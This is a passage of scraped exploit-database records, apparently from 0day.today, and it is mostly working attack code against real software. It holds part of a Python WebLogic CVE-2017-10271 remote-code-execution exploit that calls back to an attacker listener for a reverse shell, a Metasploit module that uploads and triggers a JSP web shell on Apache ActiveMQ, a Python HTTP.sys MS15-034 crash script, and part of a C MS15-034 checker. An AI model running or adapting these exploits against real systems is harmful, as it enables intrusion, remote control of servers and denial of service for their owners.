</object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n 
print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n # The WorkContext SOAP header is handed to java.beans.XMLDecoder by the wls-wsat servlet\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n # format() must apply to the string, not to the return value of print() (None under Python 3)\r\n print('[+] Running {target} execute payload'.format(target=self.target))\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-11T01:13:03", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.", "cvss3": {}, "published": "2017-06-30T00:00:00", "type": "zdt", "title": "Apache ActiveMQ < 5.14.0 - Web Shell Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2017-06-30T00:00:00", "id": "1337DAY-ID-28066", "href": "https://0day.today/exploit/description/28066", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ActiveMQ web shell upload',\r\n 'Description' => %q(\r\n The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\r\n allows remote attackers to upload and execute arbitrary files via an\r\n HTTP PUT followed by an HTTP MOVE request.\r\n ),\r\n 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-3088' ],\r\n [ 'URL', 
'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => %w{ java linux win },\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => \"Jun 01 2016\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),\r\n OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),\r\n OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),\r\n OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),\r\n Opt::RPORT(8161)\r\n ])\r\n register_advanced_options(\r\n [\r\n OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])\r\n ])\r\n end\r\n\r\n def jsp_text(payload_name)\r\n %{\r\n <%@ page import=\"java.io.*\"\r\n %><%@ page import=\"java.net.*\"\r\n %><%\r\n URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath(\"./#{payload_name}.jar\")).toURI().toURL()});\r\n Class c = cl.loadClass(\"metasploit.Payload\");\r\n c.getMethod(\"main\",Class.forName(\"[Ljava.lang.String;\")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});\r\n %>}\r\n end\r\n\r\n def exploit\r\n jar_payload = payload.encoded_jar.pack\r\n payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))\r\n host = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n @url = datastore['SSL'] ? 
\"https://#{host}\" : \"http://#{host}\"\r\n paths = get_upload_paths\r\n paths.each do |path|\r\n if try_upload(path, jar_payload, payload_name)\r\n break handler if trigger_payload(payload_name)\r\n print_error('Unable to trigger payload')\r\n end\r\n end\r\n end\r\n\r\n def try_upload(path, jar_payload, payload_name)\r\n ['.jar', '.jsp'].each do |ext|\r\n file_name = payload_name + ext\r\n data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload\r\n move_headers = { 'Destination' => \"#{@url}#{path}#{file_name}\" }\r\n upload_uri = normalize_uri('fileserver', file_name)\r\n print_status(\"Uploading #{move_headers['Destination']}\")\r\n # String#casecmp returns -1/0/1, all truthy in Ruby, so the comparison must test for zero\r\n register_files_for_cleanup \"#{path}#{file_name}\" if datastore['AutoCleanup'].casecmp('true').zero?\r\n # PUT stores the file under the unauthenticated /fileserver tree; MOVE relocates it into a JSP-enabled webapp directory\r\n return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&\r\n send_request('MOVE', upload_uri, 204, 'headers' => move_headers)\r\n @trigger_resource = /webapps(.*)/.match(path)[1]\r\n end\r\n true\r\n end\r\n\r\n def get_upload_paths\r\n base_path = \"#{get_install_path}/webapps\"\r\n custom_path = datastore['UploadPath']\r\n return [normalize_uri(base_path, custom_path)] unless custom_path.nil?\r\n [ \"#{base_path}/api/\", \"#{base_path}/admin/\" ]\r\n end\r\n\r\n def get_install_path\r\n properties_page = send_request('GET', \"#{@url}/admin/test/systemProperties.jsp\").body\r\n match = properties_page.tr(\"\\n\", '@').match(/activemq\\.home<\\/td>@\\s*<td>([^@]+)<\\/td>/)\r\n return match[1] unless match.nil?\r\n end\r\n\r\n def send_request(method, uri, expected_response = 200, opts = {})\r\n opts['headers'] ||= {}\r\n opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])\r\n opts['headers']['Connection'] = 'close'\r\n r = send_request_cgi(\r\n {\r\n 'method' => method,\r\n 'uri' => uri\r\n }.merge(opts)\r\n )\r\n return false if r.nil? 
|| expected_response != r.code.to_i\r\n r\r\n end\r\n\r\n def trigger_payload(payload_name)\r\n send_request('POST', @url + @trigger_resource + payload_name + '.jsp')\r\n end\r\n\r\n def error_out\r\n print_error('Upload failed')\r\n @trigger_resource = nil\r\n false\r\n end\r\nend\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/28066", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-02T21:24:30", "description": "Reverdes from http.sys exploit includes ROP gadgets for Server 2008 and Server 2012 only!\n\nThis is private exploit. You can buy it at https://0day.today", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "zdt", "title": "MS15-034 Microsoft IIS Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-04-19T00:00:00", "id": "1337DAY-ID-23531", "href": "https://0day.today/exploit/description/23531", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-08T22:52:53", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2015-04-17T00:00:00", "type": "zdt", "title": "Microsoft Window (HTTP.sys) HTTP Request Parsing DoS (MS15-034)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-04-17T00:00:00", "id": "1337DAY-ID-23524", "href": "https://0day.today/exploit/description/23524", "sourceData": "#Tested on Win Srv 2012R2.\r\nimport socket,sys\r\n \r\nif len(sys.argv)<=1:\r\n sys.exit('Give me an IP')\r\n \r\nHost = sys.argv[1]\r\n \r\ndef SendPayload(Payload, Host):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((Host, 80))\r\n s.send(Payload)\r\n s.recv(1024)\r\n s.close()\r\n \r\n#Make sure iisstart.htm exist.\r\nInit = \"GET /iisstart.htm HTTP/1.0\\r\\n\\r\\n\"\r\nPayload = \"GET 
/iisstart.htm HTTP/1.1\\r\\nHost: blah\\r\\nRange: bytes=18-18446744073709551615\\r\\n\\r\\n\"\r\n \r\nSendPayload(Init, Host)\r\nSendPayload(Payload, Host)\n\n# 0day.today [2018-04-08] #", "sourceHref": "https://0day.today/exploit/23524", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-03T01:36:34", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdt", "title": "Microsoft Window - HTTP.sys PoC (MS15-034)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-04-15T00:00:00", "id": "1337DAY-ID-23518", "href": "https://0day.today/exploit/description/23518", "sourceData": "/*\r\n UNTESTED - MS15-034 Checker\r\n \r\n THE BUG:\r\n \r\n 8a8b2112 56 push esi\r\n 8a8b2113 6a00 push 0\r\n 8a8b2115 2bc7 sub eax,edi\r\n 8a8b2117 6a01 push 1\r\n 8a8b2119 1bca sbb ecx,edx\r\n 8a8b211b 51 push ecx\r\n 8a8b211c 50 push eax\r\n 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here\r\n \r\n ORIGINAL POC: http://pastebin.com/raw.php?i=ypURDPc4\r\n \r\n BY: [email\u00a0protected]\r\n Twitter: @rhcp011235\r\n*/\r\n \r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <arpa/inet.h> \r\n \r\n/* Open a TCP connection to port 80 on ip; exits the process on any failure\r\n so the caller never receives a bogus descriptor. */\r\nint connect_to_server(char *ip)\r\n{\r\n int sockfd = 0;\r\n \r\n struct sockaddr_in serv_addr;\r\n \r\n if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"\\n Error : Could not create socket \\n\");\r\n exit(1);\r\n }\r\n \r\n memset(&serv_addr, 0, sizeof(serv_addr)); /* zero bytes, not the character '0' */\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(80);\r\n if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)\r\n {\r\n printf(\"\\n inet_pton error occurred\\n\");\r\n exit(1);\r\n }\r\n if( 
connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"\\n Error : Connect Failed \\n\");\r\n exit(1);\r\n } \r\n \r\n return sockfd;\r\n}\r\n \r\n \r\nint main(int argc, char *argv[])\r\n{\r\n int n = 0;\r\n int sockfd;\r\n char recvBuff[1024] = {0}; /* zeroed so strstr() below always finds a terminator */\r\n \r\n // Check server\r\n char request[] = \"GET / HTTP/1.0\\r\\n\\r\\n\";\r\n \r\n // our evil buffer: the upper Range bound is 2^64-1, which overflows the 64-bit length arithmetic shown in THE BUG above\r\n char request1[] = \"GET / HTTP/1.1\\r\\nHost: stuff\\r\\nRange: bytes=0-18446744073709551615\\r\\n\\r\\n\";\r\n \r\n \r\n if(argc != 2)\r\n {\r\n printf(\"\\n Usage: %s <ip of server> \\n\",argv[0]);\r\n return 1;\r\n } \r\n \r\n printf(\"[*] Audit Started\\n\");\r\n sockfd = connect_to_server(argv[1]);\r\n write(sockfd, request, strlen(request)); \r\n n = read(sockfd, recvBuff, sizeof(recvBuff)-1);\r\n if (n > 0)\r\n recvBuff[n] = '\\0'; /* terminate exactly what was received */\r\n \r\n if (!strstr(recvBuff,\"Microsoft\"))\r\n {\r\n printf(\"[*] NOT IIS\\n\");\r\n exit(1);\r\n }\r\n \r\